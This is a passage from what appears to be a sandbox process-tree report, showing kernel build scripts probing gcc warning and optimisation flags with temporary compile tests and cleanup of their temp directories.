-DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Warray-bounds -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-array-bounds\"; else echo \"\"; fi"3⤵PID:1849
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18494⤵PID:1850
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Warray-bounds -c -x c /dev/null -o /tmp/a/.tmp_1849/tmp4⤵
- Writes file to tmp directory
PID:1851 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1849/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Warray-bounds "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccDhroS8.s5⤵PID:1852
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1849/tmp /tmp/ccDhroS8.s5⤵PID:1853
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1849/tmp /tmp/ccDhroS8.s5⤵PID:1853
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1849/tmp /tmp/ccDhroS8.s5⤵PID:1853
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1849/tmp /tmp/ccDhroS8.s5⤵PID:1853
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18494⤵PID:1854
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-overflow\"; else echo \"\"; fi"3⤵PID:1855
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18554⤵PID:1856
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wstringop-overflow -c -x c /dev/null -o /tmp/a/.tmp_1855/tmp4⤵PID:1857
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1855/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=2" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccRDJsmA.s5⤵PID:1858
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1855/tmp /tmp/ccRDJsmA.s5⤵PID:1859
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1855/tmp /tmp/ccRDJsmA.s5⤵PID:1859
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1855/tmp /tmp/ccRDJsmA.s5⤵PID:1859
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1855/tmp /tmp/ccRDJsmA.s5⤵PID:1859
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18554⤵PID:1860
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-restrict\"; else echo \"\"; fi"3⤵PID:1861
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18614⤵PID:1862
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wrestrict -c -x c /dev/null -o /tmp/a/.tmp_1861/tmp4⤵PID:1863
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1861/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wrestrict "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccpK2S02.s5⤵PID:1864
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1861/tmp /tmp/ccpK2S02.s5⤵PID:1865
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1861/tmp /tmp/ccpK2S02.s5⤵PID:1865
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1861/tmp /tmp/ccpK2S02.s5⤵PID:1865
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1861/tmp /tmp/ccpK2S02.s5⤵PID:1865
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18614⤵PID:1866
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wmaybe-uninitialized -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-maybe-uninitialized\"; else echo \"\"; fi"3⤵PID:1867
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18674⤵
- Reads runtime system information
PID:1868
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wmaybe-uninitialized -c -x c /dev/null -o /tmp/a/.tmp_1867/tmp4⤵
- Writes file to tmp directory
PID:1869 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1867/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wmaybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccuE8spy.s5⤵PID:1870
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1867/tmp /tmp/ccuE8spy.s5⤵PID:1871
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1867/tmp /tmp/ccuE8spy.s5⤵PID:1871
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1867/tmp /tmp/ccuE8spy.s5⤵PID:1871
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1867/tmp /tmp/ccuE8spy.s5⤵PID:1871
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18674⤵PID:1872
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-strict-overflow\"; else echo \"\"; fi"3⤵PID:1873
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18734⤵PID:1874
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -c -x c /dev/null -o /tmp/a/.tmp_1873/tmp4⤵PID:1875
-
